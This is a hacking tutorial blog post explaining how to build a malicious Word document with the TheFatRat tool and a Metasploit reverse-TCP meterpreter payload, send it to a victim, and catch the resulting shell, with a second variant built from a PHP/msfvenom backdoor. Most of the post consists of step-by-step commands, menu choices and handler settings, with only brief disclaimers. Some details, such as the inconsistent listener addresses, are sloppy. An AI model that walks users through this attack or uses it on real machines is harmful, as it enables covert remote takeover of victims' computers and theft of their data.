How To exploit Windows Systems with FATRAT & a .doc file
Microsoft Office is by far the most used office tool for creating and editing .doc files. But is it as secure as everyone thinks or Can hackers hack and exploit Windows 10 with Microsoft Word (.doc file)?
I mean what can an innocent-looking .doc file do to exploit your system. Turns out quite a lot. This tutorial will show you how a malicious .doc file and a Windows system compromise give shell access to attackers on the internet.
Note: I have tested this exploit on office 2007, and it works perfectly. Higher versions not so much. The latest versions are safe from this exploit.
Table of contents
What is FATRAT Hacking tool?
FATRAT is a remote administration framework used to make rat applications and rat apk files with reverse shells that can be used for controlling devices remotely. By using FATRAT, we can hack any of the most used operating systems like Windows, iOS, Android, and Mac. Today we will hack windows 10. So let’s hack windows with Microsoft office.
Hacking Windows with FATRAT and MS Office Exploit
Disclaimer:
Please be aware that exploiting or testing any device is illegal unless you have permission from the owner and the parties involved. This post should be used as a tool to help people understand how hackers can exploit windows 10 devices with .doc files and tools such as FATRAT. We shall not be held responsible if any criminal charges are brought against any person who misuses the information on this website to violate the law.
So let’s learn the steps to hack windows 10 with word files. So let’s start hacking.
Step 1: Open Kali terminal and clone FATRAT tool from Github
Git clone the following FATRAT repository from the Kali Linux terminal and run the following commands to setup FATRAT:
For cloning fatrat type
git clone https://github.com/Screetsec/TheFatRat.git
Then type cd TheFatRat
Step 2: Setup and give root and execution permissions
Give the FATRAT folder and the hacking script root permissions to compile and execute in Kali Linux. Use the following command:
chmod +x setup.sh
Step 3: Install FATRAT tool
Use the following command to start the installation of FATRAT in Kali Linux.
./setup.sh
Once fatrat is installed, you will see the following screen
Type y for yes so that you can run fatrat from any terminal.
CREATING MIRCOSOFT WORD EXPLOIT TO HACK WINDOWS
We will create a backdoor for the office using Microsoft. To select this windows backdoor hack
Type 7
Now we will create a backdoor with a word file and hack windows 10
Type 2
Now that you have chosen the exploit to use for the backdoor.
You have to give the necessary options and information for hacking windows 10
Enter LHOST listener/attacker IP address.
Type 192.168.1.12
Type port 4444 or any port number.
Enter backdoor file name testing file
Type 3 for using windows/meterpreter/reverse_tcp exploit.
Press enter to create a backdoor with the specified exploit.
After backdoor file is created, it will be saved in /home/user/Downloads/TheFatRat/output/testingfile.docm
You can send the backdoor file over mail or sending it via a USB drive might work as well.
Step 5: Metasploit setup
Startup a terminal and type the following command to start Metasploit.
# msfconsole
Now in the Metasploit console type the following commands
Use the below commands
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.182.136
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
Note:
**lhost= YOUR IP address
**lport= 4444
Step 6: Exploit the target with the backdoor
Once the target clicks on the word file, the backdoor script will execute, and the meterpreter session will be opened in msfconsole, as shown below.
The above victim is using Windows 10 system with office 2007 installed.
Type the “help” or “?” command to see all the possible options you can use on Metasploit for hacking windows systems.
Still not satisfied? Let’s do one more with a slight twist.
How to hack a window 10 with a .doc file
Step 1: Startup fatrat
Here, we will create a backdoor using PHP. Type 1
Create backdoor with msfvenom
Then type 12
FATRAT.PHP BACKDOOR
Step 2: Enter the required details to set up the target
Enter
LAST 192.168.182.136
Then enter
port 4444
Type file name as textfile
As shown, the backdoor for hacking windows with doc files will be created.
Step 3: Metasploit setup
Open up a Linux terminal and type the following command to start Metasploit.
# msfconsole
Now in the Msfconsole enter the commands:
MSF > use exploit/multi/handler
MSF exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.182.136
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
Step 4: Exploit the victim
As the target victim opens the malicious doc file. The windows system will be hacked, and we will get a shell terminal with access to control the target system.
You will get a meterpreter shell on the Kali Linux terminal as shown below.
You have now successfully exploited and hacked a WINDOWS 10 device using a word file.
Type the “help” command to show all the possible options for exploitation.
e.g. getsystem command can get you admin access.
So, this is how hackers can exploit windows with Microsoft word & the FATRAT tool.
Commonly asked questions about hacking windows with Word files:
Q1 Is hacking windows devices legal?
No, hack windows devices is not legal. We do not support hacking or exploiting devices. This post is just to show how hackers can exploit windows 10 systems and devices by using word files.
Q2 The word files I made are detected as a virus by antivirus. Am I safe?
Do not worry, you are safe. The alert is because you made your own virus, which is hidden in the word file. The antivirus software might detect the virus. Which only means you have a great antivirus. Cheers, and be glad.
Q3. How can I hack my friends/Spouses pc with this hack?
This hack is only for educational purposes, not for hacking people. We do not support any illegal hacking. Kindly refrain from such comments and requests. This tutorial is for educational purposes only.
Q4. Does it work on higher versions of Microsoft Word?
It works on some versions of Microsoft 2010. But after that, Microsoft has long since patched this exploit. So you are probably safe as long as you stay updated to the latest version.
You may also like
Investigating cybercrime with OSINT
Steganography: Hiding Secret Files using openstego
